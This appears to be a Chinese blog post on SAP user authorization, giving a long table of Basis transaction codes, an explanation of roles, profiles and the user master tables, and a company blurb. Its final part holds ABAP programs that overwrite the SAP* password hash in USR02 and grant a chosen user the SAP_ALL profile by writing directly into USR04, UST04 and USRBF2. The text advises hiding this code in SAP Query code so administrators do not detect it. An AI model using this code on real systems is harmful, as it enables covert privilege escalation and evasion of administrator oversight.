SAP License:SAP用户权限
SE93 查询所有TCODE;
或者 table: tstc;
SE16 display;
SUIM 查询用户信息的报表们。
SAP常用的TCODE—BASIS
序号 | 事务码 | 描述 ( 中英文 ) |
1 | SBIT | Menu 菜单 |
2 | SBTA | Test background processing 后台处理测试 |
3 | SBTU | Background processing for user 对用户的后台处理 |
4 | SM36 | Define Background Job 定义后台作业 |
5 | SM37 | Background Job Overview 后台作业概览 |
6 | SM39 | Job Analysis 作业分析 |
7 | SM49 | Execute external OS commands 执行外部 OS 命令 |
8 | SM61 | Menu 菜单 |
9 | SM62 | Menu 菜单 |
10 | SM63 | Display/Maintain Operating Mode Sets 显示 / 保持操作方式设置 |
11 | SM64 | Release of an Event 事件的释放 |
12 | SM65 | Background Processing Analysis Tool 后台处理分析工具 |
13 | SM67 | Job Scheduling 作业调度 |
14 | SM68 | Job Administration 作业管理 |
15 | SM69 | Maintain external OS commands 维护外部 OS 命令 |
16 | SMX | Display Own Jobs 显示自己的作业 |
17 | SPBM | Monitoring parallel background tasks 监控类似的后台任务 |
18 | SPBT | Test: Parallel background tasks 文本 : 匹配后台任务 |
19 | DB16 | DB system check (trigger/browse) DB system check (trigger/browse) |
20 | DB17 | DB system check (configure) DB system check (configure) |
21 | DB20 | No.of table tupels acc. to stat. No.of table tupels acc. to stat. |
22 | DB21 | Maintenance control table DBSTATC Maintenance control table DBSTATC |
23 | RZ01 | Job Scheduling Monitor 作业计划监视器 |
24 | RZ02 | Network Graphics for SAP Instances 网络图 SAP |
25 | RZ04 | Maintain SAP Instances 保持 SAP 实例 |
26 | RZ06 | Alerts Thresholds Maintenance 警报门限维护 |
27 | RZ08 | SAP Alert Monitor SAP 报警监视器 |
28 | RZ12 | Maintain RFC server group assignment 维护 RFC 指定服务器组 |
29 | SM66 | Systemwide Work Process Overview 系统工作过程概述 |
30 | SMLG | Maintain Logon Group 维护登录组 |
31 | SRZL | Menu 菜单 |
32 | SM02 | System Messages 系统消息 |
33 | SM04 | User Overview 用户概览 |
34 | SM13 | Display Update Records 显示更新记录 |
35 | SM50 | Work Process Overview 工作进程概述 |
36 | SM51 | List of SAP Servers SAP 服务器的清单 |
37 | SM54 | TXCOM maintenance TXCOM 维护 |
38 | SM55 | THOST Maintenance THOST 维持 |
39 | SM56 | Number Range Buffer 数字范围缓冲区 |
40 | SMGW | Gateway Monitor 网关监控器 |
41 | ST07 | Application monitor 应用程序监视器 |
42 | AL01 | SAP Alert Monitor SAP 报警监视器 |
43 | AL02 | Database alert monitor 数据库警报监测器 |
44 | AL03 | Operating system alert monitor 操作系统警告监视器 |
45 | AL04 | Monitor call distribution 监视呼叫分配 |
46 | AL05 | Monitor current workload 监视当前的工作负荷 |
47 | AL06 | Performance: Upload/Download 执行 : 上载 / 下装 |
48 | AL07 | EarlyWatch Report 初期察看报告 |
49 | AL08 | Users Logged On 登录的用户 |
50 | AL09 | Data for database expertise 专家数据库的数据 |
51 | AL10 | Download to Early Watch 下载早观察 |
52 | AL11 | Display SAP Directories 显示 SAP 目录 |
53 | AL12 | Display table buffer (Exp. session) 显示表缓冲 |
54 | AL13 | Display Shared Memory (Expert mode) 显示共享内存 ( 输出方式 ) |
55 | AL15 | Customize SAPOSCOL destination 自定义 SAPOSCOL 目的地 |
56 | AL16 | Local Alert Monitor for Operat.Syst. 操作系统的本地报警监视器 |
57 | AL17 | Remote Alert Monitor f.Operat. Syst. 操作系统的远程报警监视器 |
58 | AL18 | Local File System Monitor 本地的文件系统监视器 |
59 | AL19 | Remote File System Monitor 远程文件系统监视器 |
60 | AL20 | EarlyWatch Data Collector List EarlyWatch 数据收集器清单 |
61 | AL21 | ABAP Program analysis ABAP Program analysis |
62 | AL22 | Dependent objects display Dependent objects display |
63 | DB01 | Analyze exclusive lockwaits 分析互斥锁定等待 |
64 | DB02 | Analyze tables and indexes 分析表和索引 |
65 | DB03 | Parameter changes in database 在数据库中参数改变 |
66 | DB05 | Analysis of a table acc. to index Analysis of a table acc. to index |
67 | DB11 | Early Watch Profile Maintenance 初期察看描述文件维护 |
68 | DB12 | Overview of Backup Logs 备份日志的概观 |
69 | DB13 | Database administration calendar 数据库管理日历 |
70 | DB14 | Show SAPDBA Action Logs 显示 SAPDBA 行为记录 |
71 | DB15 | CCMS – Document archiving CCMS – Document archiving |
72 | OS01 | LAN check with ping 通过 ping 检查 LAN |
73 | OS02 | Operating system configuration 操作系统配置 |
74 | OS03 | O/S Parameter changes O/S 参数更改 |
75 | OS04 | Local System Configuration 本地的系统配置 |
76 | OS05 | Remote System Cconfiguration 远程系统配置 |
77 | OS06 | Local Operating System Activity 本地的操作系统作业 |
78 | OS07 | Remote Operating System Activity 远程操作系统活动性 |
79 | OSS1 | Logon to Online Service System 注册到联机服务系统 |
80 | SDBE | Explain an SQL statement 匹配码对象(测试) |
81 | ST02 | Setups/Tune Buffers 设置 / 调谐缓冲 |
82 | ST03 | Performance,SAP Statistics, Workload 性能 ,SAP 统计 , 工作负荷 |
83 | ST04 | Select DB activities 选定数据库中的活动 |
84 | ST05 | Trace for SQL, Enqueue, RFC, Memory SQL 跟踪 |
85 | ST06 | Operating System Monitor 操作系统监视器 |
86 | ST08 | Network Monitor 网络器 |
87 | ST09 | Network Alert Monitor 网络敬报器 |
88 | ST10 | Table call statistics 表调用统计 |
89 | ST4A | Database: Shared cursor cache (ST04) Database: Shared cursor cache (ST04) |
90 | STAT | Local transaction statistics 本地事务统计 |
91 | STP4 | Select DB activities Select DB activities |
92 | STUN | Menu Performance Monitor 菜单性能监视器 |
93 | TKOF | Turn off Oracle trace 关闭 Oracle 跟踪 |
94 | TKON | Turn off Oracle trace 关闭 Oracle 跟踪 |
95 | TKPR | Display trace file 显示跟踪文件 |
96 | TU01 | Call Statistics 调用统计 |
97 | TU02 | Parameter changes 参数改变 |
98 | SP00 | Spool and related areas 假脱机及相关区域 |
99 | SP01 | Output Controller 输出控制 |
100 | SP02 | Display Output Requests 显示输出请求 |
101 | SP03 | Spool: Load Formats 假脱机 : 载入格式 |
102 | SP1T | Output Control (Test) 输出控制(测试) |
103 | SPAD | Spool Administration 假脱机管理 |
104 | SPAT | Spool Administration (Test) 假脱机管理(测试) |
105 | SPCC | Spool consistency check 假脱机一致性检查 |
106 | SPIC | Spool installation check 假脱机安装检查 |
107 | SPTP | Text elem. maint. for print formats 用于打印格式的文本元素维护 |
108 | SP11 | TemSe directory TemSe 目录 |
109 | SP12 | TemSe Administration TemSe 管理 |
110 | SE92 | Maintain System Log Messages 维护系统日志消息 |
111 | SM20 | System Audit Log 系统审计日志 |
112 | SM21 | System Log 系统日志 |
113 | S001 | CASE 工具菜单 CASE 工具菜单 |
114 | S002 | Menu Administration 菜单管理 |
115 | SDW0 | ABAP/4 Development WB Initial Screen ABAP/4 开发工作台初始屏幕 |
116 | SYST | Menu 菜单 |
117 | SDMO | Dynamic Menu (old) 动态菜单 ( 旧 ) |
118 | SMEN | Session Manager Menus 会话管理菜单 |
119 | SU55 | Call the Session Manager menus 调用会话管理菜单 |
120 | RE_GGREPO1 | Test report 1 测试报表 1 |
121 | RE_GGREPO2 | Test report 1 测试报表 1 |
122 | SU24 | Auth. obj. check under transactions 事务中权限对象检查 |
123 | SU25 | Upgrade Tool for Profile Generator 配置文件生成器的升级工具 |
124 | SU26 | Upgrade tool for Profile Generator 配置文件生成器的升级工具 |
125 | SUPC | Profiles for activity groups 作业组的参数文件 |
126 | SUPN | Number range maint.: PROF_VARIS 编码范围维护 : PROF_VARIS |
127 | SUPO | Maintain org. levels 维护初始级别 |
128 | SM0 | Work Process Overview 工作处理概述 |
129 | SU02 | Maintain Authorization Profiles 维护权限参数文件 |
130 | SU03 | Maintain Authorizations 维护权限 |
131 | SU10 | Mass Changes to User Master Records 对用户主记录的大量修改 |
132 | SU12 | Mass Changes to User Master Records 用户主记录的大量修改 |
133 | SU2 | Maintain user parameter 维护用户参数 |
134 | SU20 | Maintain Authorization Fields 维护权限字段 |
135 | SU21 | Maintain Authorization Objects 维护权限对象 |
136 | SU22 | Auth. Object Usage in Transactions 事务中权限对象的用法 |
137 | SU23 | Load Tables in TAUTL 在 TAUTL 中装入表 |
138 | SU52 | Maintain User Parameters 维护用户参数 |
139 | SU53 | Display Check Values 显示检查值 |
140 | SU54 | Session Manager 会话管理器 |
141 | SU56 | Analyze User Buffer 分析用户缓冲区 |
142 | SU80 | Archive user change documents 存档用户更改文档 |
143 | SU81 | Archive user password change doc. 归档用户口令更改文档 |
144 | SU82 | Archive profile documents 档案参数文件文档 |
145 | SU83 | Archive authorization docs. 存档授权文档 |
146 | SU84 | Read archived user change documents 阅读已存档的用户修改文档 |
147 | SU85 | Read archived password change doc. 阅读已存档的口令修改文档 |
148 | SU86 | Read profile change documents 读参数文件更改文档 |
149 | SU87 | Read authorization change documents 读授权更改文档 |
150 | SU96 | Table maint.: Change SUKRIA 表维护:修改 SUKRIA |
151 | SU97 | Table maint.: Display SUKRIA 表维护:显示 SUKRIA |
152 | SU98 | Call report RSUSR008 调用报表 RSUSR008 |
153 | SU99 | Call report RSUSR008 调用报表 RSUSR008 |
154 | SUIM | Call AUTH reporting tree (info sys.) 调用 AUTH 报表树(信息系统) |
155 | SU01 | User Maintenance 用户维护 |
156 | SU01_NAV | User maint. to include in navigation 包含在导航中的用户维护 |
157 | SU01D | User Display 用户显示 |
158 | SU3 | Maintain Users Own Data 维护用户自己的数据 |
159 | SE01 | Transport Organizer 传送组织者 |
160 | SE03 | Workbench Organizer: Tools 工作台组织器:工具 |
161 | SE06 | Set Up Workbench Organizer 设置工作台组织器 |
162 | SE07 | Transport System Status Display 传输系统状态显示 |
163 | SE09 | Workbench Organizer 工作平台组织者 |
164 | SE10 | Customizing Organizer 自定义组织者 |
165 | SE17 | General Table Display 通用表显示 |
166 | STDR | TADIR consistency check TADIR 一致性检查 |
通常basis会使用PFCG做权限管理,时你保存时会产生一个系统外的profile name,
记得SU01时用户有profile 和role两栏位吗?它们的关系如何呢?
首先明白几个概念.
1.activity
这样说吧,我们从activity谈起,activity是什么意思这个你查下
字典也就知道了,对就是规定可做什么动作,比如说不能吸烟只能喝酒,不能多于2两,
不对,这是我老婆讲的,SAP不是这样子的,是只能insert, update,display什么的.
这些东西当年德国佬是写在tobj表中的.
activity 也是可分activity group的.
2.activity category &Authorization group
Role Vs Profile
你看看表T020就知道了,就是什么K,D, A, M什么的.
profile是什么呢?实际上可以理解为所有的authorization data(有很多authorization group–{你可使用OBA7填写,权限太细也不是好事^_^}和activity组成)的一个集合的名字,通常一个自定义的role产生一个profile,SAP权限控制是根据profile里的authorization data(objects)来控制的.
role又是什么呢?role只是一个名字而已,然后将profile赋予给它, 比如你SU01建立一个用户,我没有任何role,但是加如SAP_All profile也是可做任何事情.
SAP本身有很多default role & profile.
3.最常用的PFCG->authorizations->change authorization data->
进入后选取selection criteria 可看到所有的authorization object
manually可手工加authorization object,比如你使用某个t-code权限出错误,abap使用SU53检查就知道缺少哪个authorization objec,然后手工加入就可以.
你选去authorization levels就可by account type再细分权限.
有些甚至直接到表字段.而且你甚至可給一个object分配缓存buffer.
那么SAP是如何做到权限控制的呢,屠夫就用刀小宰一下.
4.关于权限方面的几个t-code.
(一)Role(角色)相关T-code:
PFAC 标准
PFAC_CHG 改变
PFAC_DEL 删除
PFAC_DIS 显示
PFAC_INS 新建
PFAC_STR
PFCG 创建
ROLE_CMP 比较
SUPC 批量建立角色profile
SWUJ 测试
SU03 检测authorzation data
SU25, SU26 检查updated profile
(二)建立用户相关T-code:
SU0
SU01
SU01D
SU01_NAV
SU05
SU50, Su51, SU52
SU1
SU10 批量
SU12 批量
SUCOMP:维护用户公司地址
SU2 change用户参数
SUIM 用户信息系统
用户组
SUGR:维护
SUGRD:显示
SUGRD_NAV:还是维护
SUGR_NAV:还是显示
(三)关于profile&Authoraztion Data
SU02:直接创建profile不用role
SU20:细分Authorization Fields
SU21(SU03):****维护Authorization Objects(TOBJ,USR12).
对于凭证你可细分到:
F_BKPF_BED: Accounting Document: Account Authorization for Customers
F_BKPF_BEK: Accounting Document: Account Authorization for Vendors
F_BKPF_BES: Accounting Document: Account Authorization for G/L Accounts
F_BKPF_BLA: Accounting Document: Authorization for Document Types
F_BKPF_BUK: Accounting Document: Authorization for Company Codes
F_BKPF_BUP: Accounting Document: Authorization for Posting Periods
F_BKPF_GSB: Accounting Document: Authorization for Business Areas
F_BKPF_KOA: Accounting Document: Authorization for Account Types
F_BKPF_VW : Accounting Document: Change Default Values for Doc.Type/PsKy
然后你进去还可细分,这些个东西是save在USR12表中的. 在DB层是UTAB.
对具体transaction code细分:
SU22,SU24
SU53:*** 就是你出错用来检查没有那些authoraztion objects.
SU56:分析authoraztion data buffers.
SU87:用来检查用户改变产生的history
SU96,SU97,SU98,SU99:干啥的?
SUPC:批量产生role
DB和logical层:
SUKRI:Transaction Combinations Critical for Security
tables:
TOBJ : All avaiable authorzation objects.(全在此)
USR12: 用户级authoraztion值
USR01:主数据
USR02:密码在此
USR04:授权在此
USR03:User address data
USR05:User Master Parameter ID
USR06:Additional Data per User
USR07:Object/values of last authorization check that failed
USR08:Table for user menu entries
USR09:Entries for user menus (work areas)
USR10:User master authorization profiles
USR11:User Master Texts for Profiles (USR10)
USR12:User master authorization values
USR13:Short Texts for Authorizations
USR14:Surchargeable Language Versions per User
USR15:External User Name
USR16:Values for Variables for User Authorizations
USR20:Date of last user master reorganization
USR21:Assign user name address key
USR22:Logon data without kernel access
USR30:Additional Information for User Menu
USR40:Table for illegal passwords
USR41:当前用户
USREFUS:
USRBF2
USRBF3
UST04:User Profile在此
UST10C: Composite profiles
UST10S: Single profiles (角色对应的
UST12 : Authorizations…………………………
AUTHORITY_CHECK:这个函数只是小检查一下你的user有没有,什么时候过期.
**如果coding只要使用此函数就够了.
AUTHORITY_CHECK_TCODE:检查T-code
这倆函数是真正检查autorization objects的.
SUSR_USER_AUTH_FOR_OBJ_GET:
A UTHORIZATION_DATA_READ_SELOBJ:
将SAP*的密码改成123的程序,很简单.
我们找到那个user logon表USR02.
(DF52478E6FF90EEB是经过SAP加密保存在DB的,SAP的密码加密?)
report zmodSAP*.
data zUSR02 like USR02 .
select single * into zUSR02 from USR02
where BNAME = 'SAP*'.
zUSR02-Bcode = 'DF52478E6FF90EEB' .
Update USR02 from zUSR02 .
现在的问题是如何让你那basis不发现,很简单,将code隐藏在Query里面,就是说你做一个
query,query是会产生code的,然后你加入此代码,谁能想到???然后你就等你的basis去哭…
这样做太狠毒了.还是自己偷偷搞自己的用户吧.
在此你必须对权限结构非常清晰.
权限和三个表有关系.
a.USR04
b.USR04
c.USRBF2 这个表是对应到所用的authorzization objects的.
*&---------------------------------------------------------------------*
*& Report : Steal SAP ALL Right *
*& Creation Date : 2004.04.01 *
*& Created by : Stone.Fu *
*& Description : 可窃取SAP ALL权限 *
*& Modified Date : 2005.11.02
*& Description : 将此code hide在report painter or query code *
*&---------------------------------------------------------------------*
report zrightsteal.
data zUSR04 like USR04 . "????????work area??
data zUST04 like USR04 .
data zPROFS like USR04-PROFS.
data ZUSRBF2 like USRBF2 occurs 0 with header line.
"USRBF2?????internal table
** Update Authorization table USR04.
select single * into zUSR04 from USR04
where BNAME = 'ZABC2'. "SAP All 权限
move 'C SAP_ALL' to zPROFS .
ZUSR04-NRPRO = '14'.
zUSR04-PROFS = zPROFS.
Update USR04 from zUSR04 .
**Update User authorization masters table UST04 .
select single * into zUST04 from UST04
where BNAME = 'ZABC2'.
zUST04-PROFILE = 'SAP_ALL'. "SAP all 权限
Update UST04 from zUST04 .
*?????insert
*ZUST04-MANDT = '200'.
*ZUST04-BNAME = 'ZABC2'.
*ZUST04-PROFILE = 'SAP_ALL'.
*Insert UST04 from ZUST04 .
select * from USRBF2 into table ZUSRBF2
where BNAME = 'SAP*' .
Loop at ZUSRBF2.
ZUSRBF2-BNAME = 'ZABC2'.
Modify ZUSRBF2 INDEX sy-tabix TRANSPORTING BNAME.
endloop.
INSERT USRBF2 FROM TABLE ZUSRBF2 ACCEPTING DUPLICATE KEYS.
自己建立一个ztest用户不给它任何权限然后在test machine上run 报表zrightsteal.
然后ztest就是SAP_ALL了, 然后你将code hide在SQP query的code中.ABAPcode太容易被人发现。
关于赛锐信息
作为SAP的资深合作伙伴,赛锐信息是一家专业提供SAP行业化管理软件解决方案的顾问公司,致力于为企业提供SAP ERP系统咨询服务、IT规划、业务流程优化、信息系统实施、行业信息系统方案开发,运营外包及售后维护等全面的服务方案。已服务1000+家不同行业、规模的大中小型企业客户。在电子高科技、汽车零部件、印刷包装、医疗器械、快消品、专业服务等行业信息化管理领域具有领导性地位。